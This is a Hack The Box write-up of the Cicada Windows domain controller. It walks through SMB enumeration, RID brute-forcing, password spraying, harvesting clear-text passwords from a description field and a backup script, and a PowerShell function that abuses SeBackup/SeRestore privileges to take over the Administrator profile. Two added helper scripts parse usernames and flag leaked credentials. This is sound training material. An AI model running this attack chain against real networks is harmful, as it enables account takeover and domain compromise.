
HTB • CTF • Cicada • Write-Up

Published: at 01:14 PM

INFO

CTF URL: https://app.hackthebox.com/machines/Cicada

Machine Type: Windows

IP: 10.10.11.35

Difficulty: Easy

Reconnaissance

NMAP

nmap -p- -sS -sC -sV 10.10.11.35 -v --min-rate 10000
# result
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-04 19:03:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
57150/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h57m52s
| smb2-time:
|   date: 2024-10-04T19:03:58
|_  start_date: N/A

The target is the domain controller CICADA-DC.cicada.htb for the domain cicada.htb. Two details from the scan matter later: SMB signing is enabled and required, so NTLM relay against this host is not an option, and the clock skew of almost seven hours means any Kerberos-based tooling needs its clock synced to the DC first (the NTLM-authenticated SMB and WinRM steps below are unaffected).

Shares

Share enumeration gives the following:

smbclient -U "" -L 10.10.11.35
# result
Password for [WORKGROUP\]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk
        HR              Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share

Besides the default administrative shares, two custom shares stand out: DEV and HR.

Let’s try to enumerate them further:

# DEV (and IPC$, NETLOGON, SYSVOL)
smbclient -U "" \\\\10.10.11.35\\DEV
## result
smb: \> # the anonymous session connects but cannot list or read anything useful

# HR
smbclient -U "" \\\\10.10.11.35\\HR
## result
smb: \> ls
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024
smb: \> get "Notice from HR.txt" # download onto local machine

Notice from HR.txt contains:

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Default password: Cicada$M6Corpb*@Lp#nZp!8

We now have a password but no username to pair it with, so the next step is to find one.

Password Spray

We have one known password and no usernames, so we spray that single password across a list of domain users. Before spraying, check the domain lockout policy (crackmapexec's --pass-pol with the same null credentials) so that one attempt per account stays below the lockout threshold.

A list of users

To find users without any credentials, we can brute-force RIDs over a null SMB session. The username given here is arbitrary (and misspelt); the [+] on a non-existent user with an empty password shows the DC accepts it as a guest/null session:

crackmapexec smb 10.10.11.35 -u 'anonmyous' -p '' --rid-brute
# result
SMB         10.10.11.35     445    CICADA-DC        [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\anonmyous:
SMB         10.10.11.35     445    CICADA-DC        [+] Brute forcing RIDs
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
...
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

Let’s save the SidTypeUser entries (RID 1000 and above, i.e. the non-built-in accounts) as user.lst:

john.smoulder
sarah.dantelia
emily.oscars
david.orelious
michael.wrightson
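As an added example that is not part of the original write-up, here is a small shell helper that turns the raw crackmapexec --rid-brute output into exactly this kind of list. The RID_OUTPUT sample is constructed from the lines above plus three entries that are not on the page (the built-in Administrator and Guest accounts and a machine account at RID 1000) to show what gets filtered out; the crackmapexec invocation in the usage comment is the one from this write-up.

```shell
#!/bin/sh
# Added example, not from the original write-up: turn crackmapexec --rid-brute
# output into the one-username-per-line list used for password spraying.
# RID_OUTPUT is a constructed sample: the lines shown on the page plus three
# entries (RIDs 500, 501, 1000) added to demonstrate the filtering.
RID_OUTPUT='SMB         10.10.11.35     445    CICADA-DC        [+] Brute forcing RIDs
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)'

# rid_users: stdin = --rid-brute output, stdout = sorted, lower-cased user names.
# Step 1 (sed): keep only "(SidTypeUser)" lines and reduce each to "<rid> <name>",
#   dropping the "DOMAIN\" prefix.
# Step 2 (awk): keep RID >= 1000 (skips built-ins such as Administrator/500,
#   Guest/501, krbtgt/502) and drop machine accounts, whose names end in "$".
# Step 3: de-duplicate and sort with a fixed locale so output is stable.
rid_users() {
    sed -En 's/^.*[[:space:]]([0-9]+): [^\\]+\\(.+) \(SidTypeUser\)[[:space:]]*$/\1 \2/p' \
    | awk '$1 >= 1000 && $2 !~ /\$$/ { $1 = ""; sub(/^ /, ""); print tolower($0) }' \
    | LC_ALL=C sort -u
}

# Usage against the real target (redirect into user.lst for the spray):
#   crackmapexec smb 10.10.11.35 -u anonymous -p '' --rid-brute | rid_users > user.lst
printf '%s\n' "$RID_OUTPUT" | rid_users
```

Filtering on RID >= 1000 skips the well-known built-in accounts and dropping names ending in $ skips computer accounts; neither is something you want to burn a lockout attempt on. The same pipeline works on any domain, since the RID brute output format does not change between targets.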

Password Spray Attack

Spraying the default password with crackmapexec shows that michael.wrightson never changed it (add --continue-on-success if you want crackmapexec to keep going after the first valid hit):

crackmapexec smb 10.10.11.35 -u user.lst -p 'Cicada$M6Corpb*@Lp#nZp!8'
# result
...
[+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

We can note the obtained credentials:

User                 Password
michael.wrightson    Cicada$M6Corpb*@Lp#nZp!8

Further Enumeration

A password in a user description

Continuing enumeration with the new credentials, crackmapexec --users lists the domain users together with their description attribute, and one of them is interesting:

crackmapexec smb 10.10.11.35 -u michael.wrightson  -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
# result
...
SMB         10.10.11.35     445    CICADA-DC        cicada.htb\david.orelious                 badpwdcount: 7 desc: Just in case I forget my password is aRt$Lp#7t*VQ!3
...

The description attribute of david.orelious contains his password in clear text. Any authenticated domain user can read that attribute, which is why a "reminder" stored there is effectively public.

User                 Password
michael.wrightson    Cicada$M6Corpb*@Lp#nZp!8
david.orelious       aRt$Lp#7t*VQ!3

Access to DEV share

Then, using crackmapexec --shares, we can see that the newly obtained user has READ access to the DEV share that the anonymous session could not list:

crackmapexec smb 10.10.11.35 -u david.orelious  -p 'aRt$Lp#7t*VQ!3' --shares
# result
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions
SMB         10.10.11.35     445    CICADA-DC        -----           -----------
...
SMB         10.10.11.35     445    CICADA-DC        DEV             READ
...

In DEV share, we can find a Backup Script:

smbclient -U "david.orelious" \\\\10.10.11.35\\DEV
# after entering the password we get smbclient's shell
smb: \> ls
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024
smb: \> get Backup_script.ps1
# ctrl-D

Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

The script embeds a clear-text password for another user, emily.oscars. ConvertTo-SecureString -AsPlainText offers no protection here: the literal is right there in a file on a share that non-administrators can read.

User                 Password
michael.wrightson    Cicada$M6Corpb*@Lp#nZp!8
david.orelious       aRt$Lp#7t*VQ!3
emily.oscars         Q!3@Lp#M6b*7t*Vt
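The two leaks in this section, a password in a user's description attribute and a clear-text password inside a script on a share, are both easy to miss when scrolling through enumeration output. As an added example that is not part of the original write-up, the shell filter below flags credential-like lines in any text gathered during enumeration. LOOT is a constructed sample built from the crackmapexec --users line and the Backup_script.ps1 lines shown above, plus a clean line for michael.wrightson to show that the badpwdcount field does not cause a false hit; the regex and the function names are assumptions of this example, not tooling from the write-up.

```shell
#!/bin/sh
# Added example, not from the original write-up: triage filter for text
# gathered during enumeration (crackmapexec --users output, scripts and notes
# pulled from shares). LOOT is a constructed sample assembled from lines shown
# on the page plus one clean line.
LOOT='SMB         10.10.11.35     445    CICADA-DC        cicada.htb\michael.wrightson              badpwdcount: 0 desc:
SMB         10.10.11.35     445    CICADA-DC        cicada.htb\david.orelious                 badpwdcount: 7 desc: Just in case I forget my password is aRt$Lp#7t*VQ!3
$sourceDirectory = "C:\smb"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath'

# find_cred_leaks: stdin = any text, stdout = "<line-no>:<line>" for each line
# that looks like it carries a credential.
# - The short keywords (password, pwd, pass, secret, cred...) are wrapped in
#   non-word boundaries so that "badpwdcount" does not match on "pwd".
# - The PowerShell terms catch secrets "protected" with -AsPlainText, and
#   "/user:" catches credentials passed to net use / runas in batch files.
find_cred_leaks() {
    grep -inE \
      '(^|[^[:alnum:]_])(passw(or)?d|pwd|pass|secret|cred(ential)?s?)([^[:alnum:]_]|$)|ConvertTo-SecureString|PSCredential|/user:'
}

# count_cred_leaks: same input, prints only the number of flagged lines
# (grep -c exits 1 on zero matches; "|| true" keeps that from aborting set -e).
count_cred_leaks() {
    find_cred_leaks | grep -c '' || true
}

# Usage over real loot:  cat loot/* | find_cred_leaks
printf '%s\n' "$LOOT" | find_cred_leaks
```

On the sample this flags the david.orelious description line and the two lines of the backup script that hold the password and build the PSCredential, and nothing else. It is deliberately noisy in one direction: a line like "Password for [WORKGROUP\]:" will be flagged too, which is the right trade-off when the cost of a miss is an unexploited credential.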

User.txt

If we check emily’s access on the shares, we find that she has READ and WRITE permission on C$. Write access to an administrative share is a strong sign of elevated rights, since by default only administrators and backup-type accounts get it:

crackmapexec smb 10.10.11.35 -u emily.oscars  -p 'Q!3@Lp#M6b*7t*Vt' --shares
# result
...
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$          READ            Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$              READ,WRITE      Default share
...

Connecting with smbclient confirms it: we can browse the whole system drive.

smbclient -U "emily.oscars" \\\\10.10.11.35\\C$
# result
Password for [WORKGROUP\emily.oscars]:
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Thu Mar 14 09:24:03 2024
  $WinREAgent                        DH        0  Mon Sep 23 12:16:49 2024
  Documents and Settings          DHSrn        0  Thu Mar 14 15:40:47 2024
  DumpStack.log.tmp                 AHS    12288  Tue Nov 19 23:33:17 2024
  pagefile.sys                      AHS 2005602304  Wed Nov 20 04:04:17 2024
  PerfLogs                            D        0  Thu Aug 22 14:45:54 2024
  Program Files                      DR        0  Thu Aug 29 15:32:50 2024
  Program Files (x86)                 D        0  Sat May  8 05:40:21 2021
  ProgramData                       DHn        0  Fri Aug 30 13:32:07 2024
  Recovery                         DHSn        0  Thu Mar 14 15:41:18 2024
  Shares                              D        0  Thu Mar 14 08:21:29 2024
  System Volume Information         DHS        0  Wed Nov 20 05:25:25 2024
  Temp                                D        0  Wed Nov 20 06:12:36 2024
  Users                              DR        0  Mon Aug 26 16:11:25 2024
  Windows                             D        0  Mon Sep 23 12:35:40 2024

Let’s read user.txt:

smb: \Users\emily.oscars.CICADA\Desktop\> ls
  user.txt                           AR       34  Tue Nov 19 23:34:12 2024

                4168447 blocks of size 4096. 58391 blocks available
smb: \Users\emily.oscars.CICADA\Desktop\> get user.txt
# ---
cat user.txt
9f7804d671338e4203071b34621fafcb

Root.txt

Get a shell

WinRM is listening on 5985 (seen in the nmap scan), so we can get an interactive shell with evil-winrm:

evil-winrm -i 10.10.11.35  -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
# result
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

Token Abuse

If we check the user’s privileges, we can see that she holds both SeBackupPrivilege and SeRestorePrivilege, and that both are already enabled in the token:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeBackupPrivilege lets a process read any file regardless of its DACL (backup semantics), and SeRestorePrivilege causes the system to grant all write access to any file regardless of its ACL, which includes rewriting the file’s security descriptor. Both show State: Enabled in whoami /priv, so no extra step is needed to turn them on. With them we can grant our own account full control over a directory we are otherwise denied, such as the Administrator profile.

The following PowerShell function adds a FullControl ACE for a given user to a directory (paste it into the Evil-WinRM session):

function Acl-FullControl {
    param ($user, $path)

    if ($null -eq $user -or $null -eq $path) {
        "Usage: Acl-FullControl -user <DOMAIN\user> -path <directory>"
        return
    }

    "[+] Current permissions:"
    Get-Acl $path | Format-List

    "[+] Changing permissions to $path"
    $acl = Get-Acl $path
    # Allow rule for FullControl that is inherited by sub-folders and files.
    # Writing the DACL of a directory we do not own succeeds only because
    # SeRestorePrivilege is enabled in this token.
    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule($user, 'FullControl', 'ContainerInherit,ObjectInherit', 'None', 'Allow')
    $acl.AddAccessRule($rule)
    Set-Acl -Path $path -AclObject $acl

    "[+] Acls changed successfully."
    Get-Acl -Path $path | Format-List
}

Next, take control of Administrator’s folder:

Acl-FullControl -user cicada\emily.oscars -path C:\users\administrator

Finally, read the root.txt

*Evil-WinRM* PS C:\Users\administrator\Desktop> cat root.txt
1e36a7087d96b39005544e371f26af70

Result